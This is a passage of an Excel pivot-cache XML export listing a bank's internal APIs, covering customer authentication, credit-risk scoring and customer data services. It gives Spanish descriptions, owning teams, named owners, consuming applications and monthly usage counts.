    <s v="Customer Authentication - Otp Management"/>
    <n v="100"/>
    <s v="customer-authentication-otp-management"/>
    <s v="Permite la gestión y administración con tres capacidades en relación a la clave dinámica.  1._x0009_Consultar la información completa de bloqueo global sobre un cliente identificado por sharedKey.  2._x0009_Bloqueo de un cliente identificado por sharedKey. 3._x0009_Desbloqueo de un cliente identificado por sharedKey."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ PEP_AW1128"/>
    <n v="19"/>
    <n v="2"/>
    <n v="3"/>
    <n v="1973"/>
    <n v="20228"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-02-25T16:45:22"/>
    <s v="Customer Authentication"/>
    <n v="200"/>
    <s v="Customer Authentication - Otp Management"/>
    <n v="101"/>
    <s v="customer-authentication-otp-management"/>
    <s v="Permite la gestión y administración con tres capacidades en relación a la clave dinámica.  1._x0009_Consultar la información completa de bloqueo global sobre un cliente identificado por sharedKey.  2._x0009_Bloqueo de un cliente identificado por sharedKey. 3._x0009_Desbloqueo de un cliente identificado por sharedKey."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <s v=""/>
    <m/>
    <s v="Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ DELFINWEB_AW0748001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PEP_AW1128"/>
    <n v="19"/>
    <n v="2"/>
    <n v="3"/>
    <n v="1973"/>
    <n v="20228"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-08-14T17:18:42"/>
    <s v="Customer Authentication"/>
    <n v="104"/>
    <s v="Customer Authentication - push messages"/>
    <n v="100"/>
    <s v="customer-authentication--push-messages"/>
    <s v="Este servicio permitirá la implementación del segundo factor de autenticaciones Push, que evita que el cliente deba diligenciar un código en cualquier interfaz, sino que va a poder autenticar si compra en un celular en primer contacto aceptando a declinando en el primero contacto de mensaje a su celular.  El servicio expone los métodos necesarios para generar notificaciones Push, enviados al dispositivo móvil registrado por un cliente, para aprobar o rechazar Información de la transacción."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ PEP_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-02-25T16:45:22"/>
    <s v="Customer Authentication"/>
    <n v="200"/>
    <s v="Customer Authentication - Push Messages"/>
    <n v="200"/>
    <s v="customer-authentication-push-messages"/>
    <s v="Este servicio permitirá la implementación del segundo factor de autenticaciones Push, que evita que el cliente deba diligenciar un código en cualquier interfaz, sino que va a poder autenticar si compra en un celular en primer contacto aceptando a declinando en el primero contacto de mensaje a su celular.  El servicio expone los métodos necesarios para generar notificaciones Push, enviados al dispositivo móvil registrado por un cliente, para aprobar o rechazar Información de la transacción."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ DELFINWEB_AW0748001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PEP_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-09-13T02:57:24"/>
    <s v="Customer Behavioral Models"/>
    <n v="101"/>
    <s v="Customer Behavioral Models - Behavioral"/>
    <n v="100"/>
    <s v="customer-behavioral-models-behavioral"/>
    <s v="El API de se encargará de calcular el score (calificación) de comportamiento de un cliente, lo cual se determina por medio de un nivel de riesgo, teniendo como dominio de valores G8 siendo está la calificación más alta de riesgo, dando a entender que esto implica un riesgo para el banco, hasta G1 siendo la calificación más baja, dando a entender que esto implica un riesgo bajo para el banco.  La G de comportamiento en conjunto con otros conceptos entregan un riesgo consolidado para dar una decisión de aprobado o no en los productos del grupo Bancolombia que el cliente este solicitando."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="PEP_AW1281002"/>
    <m/>
    <m/>
    <m/>
    <n v="8"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-20T16:02:24"/>
    <s v="Customer Behavioral Models"/>
    <n v="204"/>
    <s v="Customer Behavioral Models - Behavioral"/>
    <n v="203"/>
    <s v="customer-behavioral-models-behavioral"/>
    <s v="El API Customer Behavioral Models - Behavior V2.0.0 se encargará de calcular el score (calificación) de comportamiento de un cliente, lo cual se determina por medio de un nivel de riesgo, teniendo como dominio de valores G8 siendo este la calificación más alta de riesgo, dando a entender que esto implica un riesgo para el banco, hasta G1 siendo la calificación más baja, dando a entender que esto implica un riesgo bajo para el banco. La G de comportamiento en conjunto con otros conceptos entregan un riesgo consolidado para dar una decisión de aprobado o no en los productos del grupo Bancolombia que el cliente este solicitando"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PricingBusiness_NU0091001 _x000d__x000a_ PricingBusiness_NU0091001"/>
    <m/>
    <m/>
    <m/>
    <n v="8"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-20T16:02:24"/>
    <s v="Customer Behavioral Models"/>
    <n v="204"/>
    <s v="Customer Behavioral Models - Indebtedness"/>
    <n v="101"/>
    <s v="customer-behavioral-models-indebtedness"/>
    <s v="El API Customer Behavioral Models - Indebtedness V1.0 podrá exponer el resumen del endeudamiento de los clientes con productos Bancolombia, en los cuales se evidencia el detalle a nivel de modalidad y las cuotas que tienen en calidad de titular, cotitular o como deuda indirecta de un grupo de riesgo"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <s v=""/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PricingBusiness_NU0091001 _x000d__x000a_ PricingBusiness_NU0091001"/>
    <n v="735"/>
    <n v="889"/>
    <n v="1025"/>
    <n v="1096"/>
    <n v="1003"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-22T09:28:01"/>
    <s v="Customer Behavioral Models"/>
    <n v="204"/>
    <s v="Customer Behavioral Models - Payment Capacity"/>
    <n v="102"/>
    <s v="customer-behavioral-models-payment-capacity"/>
    <s v="El API Customer Behavioral Models - Payment Capacity V1.0.0 se encarga de exponer la información de Capacidad de Pago del cliente persona natural, la cual contiene tanto los ingresos como los egresos estimados del cliente por los diferentes modelos de riesgos, para que sea consumida por cualquier área del banco que necesite esta información para apoyar los procesos internos"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PricingBusiness_NU0091001 _x000d__x000a_ PricingBusiness_NU0091001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-24T22:35:19"/>
    <s v="Customer Behavioral Models"/>
    <n v="101"/>
    <s v="Customer Behavioral Models - Payment Obligations"/>
    <n v="101"/>
    <s v="customer-behavioral-models-payment-obligations"/>
    <s v="El API brindará la capacidad de consultar el vector de mora, es decir, el comportamiento de pago de un cliente en un periodo de 6 meses, para consultar la cantidad máxima de dí­as en mora en una obligación, lo anterior para validar si es posible realizar una modificación, reestructuracion o mantenimiento sobre la obligación. Una modificación es cualquier cambio que el banco le quiere ofrecer al cliente sobre una o varias obligaciones en cualquier momento, para poder realizar una modificación a una obligación, es necesario cumplir con ciertos requisitos, no tener mora superior a 30 dí­as en los íºltimos 6 meses (maxArrear), es importante no tener ningíºn tipo de marca 026, de tipo reestructuración anterior en la obligación (Brand). Una reestructuracion es una modificación sobre una obligación cuando el cliente tuvo algíºn incumplimiento en sus pagos, las reestructuraciones tienen ciertas restricciones de tiempos y reglas impuestas por el banco para poder ser aplicadas al cliente. Un mantenimiento es realizarle una modificación a alguna de las condiciones generales de la obligación, ejemplo la tasa, el plazo o la amortización, esta modificación se le puede ofrecer al cliente cuando hay un comportamiento recurrente y el banco identifica una mejora en el pago con esta modificación. Una obligación castigada no es objeto de mantenimiento ni de modificación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Gestion integral del riesgo"/>
    <s v="Productor Transversal"/>
    <m/>
    <s v="David Esteban Lugo Posada"/>
    <m/>
    <m/>
    <s v="PEP_AW1281002"/>
    <n v="495"/>
    <n v="68"/>
    <n v="89"/>
    <n v="1482"/>
    <n v="1423"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-20T16:02:24"/>
    <s v="Customer Behavioral Models"/>
    <n v="204"/>
    <s v="Customer Behavioral Models - Payment Obligations"/>
    <n v="201"/>
    <s v="customer-behavioral-models-payment-obligations"/>
    <s v="El API brindará la capacidad de consultar el vector de mora, es decir, el comportamiento de pago de un cliente en un periodo de 6 meses, para consultar la cantidad máxima de dí­as en mora en una obligación, lo anterior para validar si es posible realizar una modificación, reestructuracion o mantenimiento sobre la obligación. Una modificación es cualquier cambio que el banco le quiere ofrecer al cliente sobre una o varias obligaciones en cualquier momento, para poder realizar una modificación a una obligación, es necesario cumplir con ciertos requisitos, no tener mora superior a 30 dí­as en los íºltimos 6 meses (maxArrear), es importante no tener ningíºn tipo de marca 026, de tipo reestructuración anterior en la obligación (Brand). Una reestructuracion es una modificación sobre una obligación cuando el cliente tuvo algíºn incumplimiento en sus pagos, las reestructuraciones tienen ciertas restricciones de tiempos y reglas impuestas por el banco para poder ser aplicadas al cliente. Un mantenimiento es realizarle una modificación a alguna de las condiciones generales de la obligación, ejemplo la tasa, el plazo o la amortización, esta modificación se le puede ofrecer al cliente cuando hay un comportamiento recurrente y el banco identifica una mejora en el pago con esta modificación. Una obligación castigada no es objeto de mantenimiento ni de modificación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Gestion integral del riesgo"/>
    <s v="Productor Transversal"/>
    <m/>
    <s v="David Esteban Lugo Posada"/>
    <s v=""/>
    <m/>
    <s v="CentralesPrecalculadas_NU0032001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PricingBusiness_NU0091001 _x000d__x000a_ PricingBusiness_NU0091001"/>
    <n v="495"/>
    <n v="68"/>
    <n v="89"/>
    <n v="1482"/>
    <n v="1423"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-11T14:42:23"/>
    <s v="Customer Case Selfmanagement"/>
    <n v="100"/>
    <s v="Customer Case Selfmanagement - Cases"/>
    <n v="100"/>
    <s v="customer-case-selfmanagement-cases"/>
    <s v="permite a los consumidores realizar la consulta sobre los casos generados por el proceso de autogestión reportados por parte de un cliente. Esta consulta podrá realizarse a partir de la identificación del cliente y un rango de fechas, por lo que devolverá 0 o muchos registros de acuerdo a los filtros ingresados."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-13T08:15:31"/>
    <s v="Customer Case"/>
    <n v="101"/>
    <s v="Customer Case-PQRS"/>
    <n v="101"/>
    <s v="customer-case-pqrs"/>
    <s v="Por medio de este servicio web se gestionarán las solicitudes de un Cliente en lí­nea, desde radicar una solicitud en SAP-CRM, Consultar sus solicitudes, reasignar responsables de solucionar el requerimiento del cliente, hasta cerrar la Solicitud una vez se ha dado la solución al objeto de reclamo por el cliente."/>
    <s v="CLIENTES"/>
    <s v="Transversales Clientes"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="No aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <m/>
    <s v="ADA_NU0150001"/>
    <n v="27"/>
    <n v="61"/>
    <n v="27"/>
    <n v="24"/>
    <n v="89"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-27T11:00:55"/>
    <s v="Customer Commercial Data"/>
    <n v="100"/>
    <s v="Customer Commercial Data - Management"/>
    <n v="100"/>
    <s v="customer-commercial-data-management"/>
    <s v="Permite realizar la consulta de la gestión comercial del cliente Colombia, tanto para persona jurí­dica, como para persona natural"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaGestionComercialCliente/V1.0"/>
    <m/>
    <s v="Thanos_AW1326001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ AppSarlaft_AW1176001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ salesforceAdapter_NU0254001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ EASYHOME_NU0004001"/>
    <n v="23170"/>
    <n v="49335"/>
    <n v="25980"/>
    <n v="29402"/>
    <n v="36749"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-27T14:37:38"/>
    <s v="Customer Contact"/>
    <n v="101"/>
    <s v="Customer Contact - Contact Information"/>
    <n v="101"/>
    <s v="customer-contact-contact-information"/>
    <s v="Permite realizar la consulta de información para contactar al cliente Colombia, persona jurí­dica o persona natural, los datos de contacto son, por ejemplo: dirección de residencia, dirección de oficina, teléfono fijo, teléfono móvil, email, entre otros."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <m/>
    <m/>
    <s v="SEG_NU0064001 _x000d__x000a_ TRACKINGSIM_NU0098001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ Networking_NU0046001 _x000d__x000a_ DELFINWEB_AW0748001 _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ Thanos_AW1326001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ ContactInfoMDM_AW0660001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001 _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ PSE-Pagos-Seguros-en-linea_NU0152001 _x000d__x000a_ AccountOpening_AW1480001 _x000d__x000a_ Kioscos_AW1272001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ PricingBusiness_NU0091001 _x000d__x000a_ TRACKING_NU0098001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <n v="327517"/>
    <n v="345337"/>
    <n v="294764"/>
    <n v="351097"/>
    <n v="456909"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-26T17:49:59"/>
    <s v="Customer Data"/>
    <n v="121"/>
    <s v="Customer Data - Keys"/>
    <n v="101"/>
    <s v="customer-data-keys"/>
    <s v="Permite consultar una llave de identificación especifica del cliente segíºn una identificación de entrada."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaLlaveroCliente/V1.0"/>
    <m/>
    <s v="creditlens_NU0038001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <n v="5080"/>
    <n v="12534"/>
    <n v="13396"/>
    <n v="17380"/>
    <n v="41948"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-26T17:49:59"/>
    <s v="Customer Data"/>
    <n v="121"/>
    <s v="Customer Data - Management"/>
    <n v="100"/>
    <s v="customer-data-management"/>
    <s v="Permite la creación y modificación de la información del cliente directamente en el maestro de clientes del banco (MDM)."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="GestionCliente/V1.0"/>
    <m/>
    <s v="creditlens_NU0038001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-26T17:49:59"/>
    <s v="Customer Data"/>
    <n v="121"/>
    <s v="Customer Data - Supplementary Information"/>
    <n v="201"/>
    <s v="customer-data-supplementary-information"/>
    <s v="Permite realizar la consulta de los datos personales del cliente Colombia, tanto para persona jurí­dica como para persona natural."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosComplementariosCliente/V1.0"/>
    <m/>
    <s v="creditlens_NU0038001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <n v="745"/>
    <n v="699"/>
    <n v="607"/>
    <n v="534"/>
    <n v="621"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-05T16:21:04"/>
    <s v="Customer Digital Identity"/>
    <n v="100"/>
    <s v="Customer Digital Identity - Information"/>
    <n v="100"/>
    <s v="customer-digital-information"/>
    <s v="Esta API permite conocer si la identidad digital de un usuario se encuentra registrada y activa."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="VDSORQUESTADORAUTOGESTIONBACK_NU0037002 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ TestApplication_AW1333002"/>
    <m/>
    <m/>
    <m/>
    <n v="80"/>
    <n v="79"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-05T16:21:04"/>
    <s v="Customer Digital Identity"/>
    <n v="100"/>
    <s v="Customer Digital Identity - Management"/>
    <n v="100"/>
    <s v="customer-digital-identity-management"/>
    <s v="Esta API permite crear una transacción asociada a un tipo de trámite, a través de la cual se pueden realizar vinculaciones y autenticaciones de usuarios, así­ como obtener acceso a la información del usuario, previa autorización del mismo. Los tramites correponden a, trámite de registro, trámite de verificación de identidad"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="VDSORQUESTADORAUTOGESTIONBACK_NU0037002 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ TestApplication_AW1333002"/>
    <n v="67"/>
    <n v="418"/>
    <n v="223"/>
    <n v="647"/>
    <n v="975"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-05T16:21:04"/>
    <s v="Customer Digital Identity"/>
    <n v="100"/>
    <s v="Customer Digital Identity - Transaction Information"/>
    <n v="100"/>
    <s v="customer-digital-identity-transaction-information"/>
    <s v="Esta API permite la consulta de información sobre el estado de la transacción, así­ como los datos que ha compartido el usuario, segíºn el tipo de trámite. Los tramites correponden a, trámite de registro, trámite de verificación de identidad"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="VDSORQUESTADORAUTOGESTIONBACK_NU0037002 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ TestApplication_AW1333002"/>
    <n v="5220"/>
    <n v="4317"/>
    <n v="6269"/>
    <n v="6332"/>
    <n v="5931"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-04T14:12:59"/>
    <s v="Customer Financial Data"/>
    <n v="111"/>
    <s v="Customer Financial Data - Financial Information"/>
    <n v="101"/>
    <s v="customer-financial-data-financial-information"/>
    <s v="Permite realizar la consulta de la información financiera de los clientes, tal como: Ingresos, Egresos, Pasivos, Activos, entre otros."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosFinancierosCliente/V1.0"/>
    <m/>
    <s v="DELFINWEB_AW0748001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="48"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-04T14:12:59"/>
    <s v="Customer Financial Data"/>
    <n v="111"/>
    <s v="Customer Financial Data - Tax Information"/>
    <n v="102"/>
    <s v="customer-financial-data-tax-information"/>
    <s v="Permite consultar la información tributaria del cliente, estos datos corresponden a la información de impuestos, retención, entre otros."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosTributariosCliente/V1.0"/>
    <s v="MDM"/>
    <s v="DELFINWEB_AW0748001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <n v="3"/>
    <n v="37"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-04-04T15:48:58"/>
    <s v="Customer Information"/>
    <n v="100"/>
    <s v="Customer Information - Keys"/>
    <n v="100"/>
    <s v="customer-information-keys"/>
    <s v="API que permite consultar una llave de identificación especifica del cliente segíºn una identificación de entrada."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-08-17T16:38:53"/>
    <s v="Customer Information Management"/>
    <n v="112"/>
    <s v="Customer Information Management - Management"/>
    <n v="112"/>
    <s v="customer-information-management-management"/>
    <s v="Permite la creación y modificación de la información del cliente directamente en el maestro de clientes del banco (MDM)."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="GestionCliente/V1.0"/>
    <m/>
    <s v="salesforceAdapter_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-11-19T17:52:03"/>
    <s v="Customer Management"/>
    <n v="100"/>
    <s v="Customer Management - Amount Limit Management"/>
    <n v="100"/>
    <s v="customer-management-amount-limit-management"/>
    <s v="Esta API permite gestionar los topes que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el dí­a o mes segíºn sea el caso. Para esto, el servicio permitirá consultar el monto lí­mite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco y permitirá tener un acumulado de las transacciones hechas por el cliente durante el dí­a para poder determinar hasta qué momento puede debitarse de sus cuentas."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GestionDeTopesMontosClientes/V1.0"/>
    <m/>
    <s v="Recargas_AW1300001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Thanos_AW1326001"/>
    <n v="875141"/>
    <n v="758501"/>
    <n v="745088"/>
    <n v="662870"/>
    <n v="803013"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-15T07:22:25"/>
    <s v="Customer Personal Data"/>
    <n v="103"/>
    <s v="Customer Personal Data - Information"/>
    <n v="103"/>
    <s v="customer-personal-data-information"/>
    <s v="Permite realizar la consulta de los datos personales del cliente Colombia, tanto para persona jurí­dica como para persona natural."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosPersonalesCliente/V1.0"/>
    <m/>
